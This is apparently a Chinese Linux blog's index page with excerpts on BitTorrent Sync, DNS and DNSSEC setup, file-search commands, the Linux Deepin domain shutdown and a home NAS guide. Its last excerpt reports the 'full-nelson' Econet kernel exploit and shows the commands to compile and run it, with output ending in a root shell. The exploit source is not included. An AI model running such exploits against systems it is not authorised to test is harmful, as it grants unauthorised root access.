同步工具BitTorrent Sync的简介,以及在ubuntu系统的安装配置和使用

 网络学院  2 条评论 »
4月 242013
 

第一部分:BitTorrent Sync简介
1,什么是BitTorrent Sync
用过BT下载的童鞋应该都听过BitTorrent这个软件,BitTorrent Labs在2013年4月23日发布了其开发的一款去中心化的同步工具BitTorrent Sync。

2.BitTorrent Sync支持的平台
目前BitTorrent Sync已经可以在Windows, Mac and Linux等平台下工作,特别是Linux平台不但支持i386和x86_64,还支持ARM,PowerPC,这样很多网络存储设备上也可以使用bitTorrent Sync了。
将来还会开发智能手机上运行的版本,如苹果IOS,Android等。

Mac OS X Snow Leopard or later
Windows XP SP3 (32-bit) or newer (32 and 64-bit)
Linux with kernel 2.6.16 (glibc 2.4) or newer on ARM/PPC/i386/x86_64
You can install our application on Network Attached Storages (NAS) running on Linux with ARM, PowerPC, i386 and x86_64 architecture. Continue reading »

ubuntu上的dns方案,完美解决IPV6优先,缓存,和Local站点指定dns问题

 DNSSec and DNS  2 条评论 »
10月 152011
 

ubuntu上的dns方案,完美解决IPV6优先,缓存,Local站点指定dns等问题.

可以正常使用本地dns解析国内大站,同时解析youtube, facebook, google时又能优先使用ipv6,当然最后还有解析结果的缓存.

后期如果需要,还可以再配置 DNSSec.

实现的工具是,unbound (http://unbound.net)

Ubuntu 如何使用指令搜尋檔案 ( find、locate、whereis、which 比較 )?

 Linux/Unix相关  没有评论 »
10月 122011
 

阿舍在用指令操作 Ubuntu 的時候,經常會需要知道檔案的路徑,所以,也就常常會用到搜尋檔案的指令,阿舍比較常用的是 whereis 和 find,其實,還有 locate 和 which 二個指令可用,這四個指令都有不同的功能,阿舍一直時間去搞清楚,今天花了點時間,就把它整理如下了。

find
這個算是功能最多的指令,可以用依檔名、擁有者、群組和權限…等等一堆來搜尋檔案,不過,find 指令是一定要指定搜尋的路徑,否則就只有搜尋目前所在的資料夾,例如,阿舍在家目錄用 find hosts 的指令來搜尋 hosts 檔的話,就一定找不到東西,如果改用 find /etc hosts 的話,就會出現一堆檔案名稱裡有 hosts 這個四個字的所有檔案出來,如果再改成 sudo find /etc -name hosts 就會找出更接近我們要找的檔案列表出來的。

locate
這個指令和其他三個指令不同的地方是,locate 指令並不是宜的去搜尋檔案,而是去搜尋由 updatedb 指令所建立和更新的資料庫並讀入記憶體中,所以,locate 指令的搜尋速度遠比其他的指令來的快, Continue reading »

使用DNSSec 防范DNS攻击 ——Unbound的安装和使用

 DNSSec and DNS  3 条评论 »
10月 122011
 

DNS安全扩展(DNSSEC),是由IETF提供的一系列DNS安全认证的机制(可参考RFC2535)。引入DNS SEC技术是为了防范在 DNS 中发现的一些无法避免的漏洞,攻击者可以利用这些漏洞劫持这一使用名称在 互联网 上搜寻某个人或某个站点的过程。这种攻击的目的是取得对会话的控制以实施某种操作,例如使用户进入劫持者自己设立的欺骗性网站,以便收集用户的帐户和密码。

本文描述的如何在你的Linux(Ubuntu)和Mac系统上启用DNSSec支持,防止域名劫持。通过安装和配置开源 DNS服务软件unbound,就可以在本地启用DNSSec的支持。 Continue reading »

关于deepin.org网站无法访问的说明(2011年5月30日)

 网络学院  没有评论 »
5月 302011
 

作者: linux deepin

2011年5月27日,我们收到通知,机房和域名注册商将停止deepin.org的解析和接入。经过一些了解,大概的原因如下:
几个月前,一位不知名的朋友写了一篇文章, 描述如何在linux deepin系统下使用内置的SSH代理脚本访问国外受限网站的配置方法。这篇文章后来又被转载到一些国外的博客上,造成有关部门认为Linux Deepin的制作目的是用来访问受限网站,导致了目前域名被限制访问的结果。

需要说明的是,这次被停止解析域名,相当的意外。:
1.该脚本并不能提供直接访问受限网站的功能。没有自己的SSH账号,即使了解这个方法,也不可能直接用它访问国外受限网站。
2.文章最初是一个不知名的用户撰写并发在自己的博客上,我们从未发表在自己的网站上,也没有对这个技术进行公开说明和宣传。
3.从技术层面上说,这个方法在任何一个Linux系统上都可以使用,所有的linux发行版都有提供类似技术的嫌疑(每个linux发行版都内置了SSH这个命令)。

目前我们能做的:
1.将域名和服务器放到国外,但不能排除以后再次**扰的情况。
2.更换网站域名和发行版域名,不再叫linux deepin,因为我们无法联系国外网站删除这些文章,也就是说linux deepin可能会被有关部门一直认为有问题。

虽然不希望一个由中国人自己做的Linux发行版不得不放到国外,或者因为这么一个奇怪的原因而改名,但好像目前除了上面的办法别无他法。我们正在准备 linxudeepin.com的域名和网站,预计3天后先恢复相应的发布和资料页面,以便大家能获得后续的信息。

无论遇到什么样的困难,我们都不会放弃在中国制作一个有国际影响力的Linux主流发行版的目标.

Linux Deepin 官方网站被停止域名解析,且主机被托管商停止接入

 网络学院  1条评论 »
5月 302011
 

Linux Deepin是国人制作的ubuntu中文衍生版,原名为Hiweed,2009年改名为Linux Deepin。官方网站linux.deepin.org在2011年5月27日被域名注册商”厦门易名网络“停止解析,且主机被托管商停止接入。

原因是有人写了一篇如何在linux deepin上翻墙的文章。从技术层面上说,翻墙方法在任何一个Linux发行版上都可以使用。目前不清楚其它发行版是否会受此影响。

打造基于ubuntu的家用多功能BT/下载机—家用NAS服务器

 Linux/Unix相关  没有评论 »
3月 232011
 

本文内容详细,建立家用nas服务器,值得一读,核对了一下原文件,补充了几个遗漏的内容。
仅做了翻译,没有做安装的验证,尽量做到没有技术错误,希望有感兴趣的fans能做个测试,分享一下经验。

HOWTO : Home made NAS server with Ubuntu 8.04.1
[HOWTO] 用Ubuntu 8.04.1搭建NAS服务器

There are many NAS for home users in the market, such as Synology, Qnap, LinkStation and etc. They are not in good performance and not cheap in price. However, they are good in less power consumption. It is because I owned not only one brand of such products at home now.
现在市场上有很多家用NAS产品,例如:Synology, Qnap, LinkStation等。它们性能并不好,而且价格不便宜。不过,在低能耗方面做得较好,因此,我家里有不止1个品牌的这类产品。

Recently, I bought a VIA PC-1 PC2500E motherboard, which has VIA C7-D 1.5GHz CPU on board. It is cheap in price and use less power too. The maximum amount of RAM is 2 GB.
最近,我买了1块VIA PC-1 PC2500E主板,板上带有VIA C7-D 1.5GHz CPU。价格便宜,也节能。最大可装2G内存。

Testing it with Ubuntu 8.04.1 Desktop version for a while, I am very satisfied with the performance of the CPU, although it is not quite fast indeed. I decided to build a home made NAS server with remote BitTorrent function.
用Ubuntu 8.04.1 Desktop测试一段时间,虽然不是足够快,我还是对CPU的性能相当满意。我决定在家组装NAS服务器,并带有远程BT功能。

Hardware
Motherboard – VIA PC-1 PC2500E with VIA C7-D 1.5GHz CPU
RAM – 2 X 1GB DDR2 667MHz (maximum)
Hard drive – 300GB Seagate SATA (The motherboard treats it as ATA drive)
Router – Planet WRT-401E (wired) (optional)

Software
Operating system – Ubuntu 8.04.1 Server Edition
File server – Samba
FTP server – vsFTPd
Remote access – OpenSSH
Web Server – Apache, PHP and MySQL
Remote BitTorrent – TorrentFlux (front-end) and BitTornado (back-end)
Security software – Fail2Ban Continue reading »

Linux 再爆 root 帐号提权漏洞

 Linux/Unix相关  没有评论 »
12月 102010
 

系统安全高手Dan Rosenberg 发布了一段 C 程序, 这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell,以下在 update 过的 Ubuntu 10.04 Server LTS 上测试通过:

$ sudo apt-get update
$ sudo apt-get upgrade

$ uname -r
2.6.32-21-server

$ gcc full-nelson.c -o full-nelson
$ ./full-nelson[*] Resolving kernel addresses…
[+] Resolved econet_ioctl to 0xffffffffa0131510
[+] Resolved econet_ops to 0xffffffffa0131600
[+] Resolved commit_creds to 0xffffffff8108b820
[+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
[*] Calculating target…
[*] Failed to set Econet address.
[*] Triggering payload…
[*] Got root!#

由于 RHEL/CentOS 默认不支持 Econet 协议,所以测试没有通过:
# yum update

$ uname -r
2.6.18-194.26.1.el5

$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Failed to open file descriptors.

如果在企业环境用 Ubuntu 的话可能会比较杯具了 Continue reading »

 下一页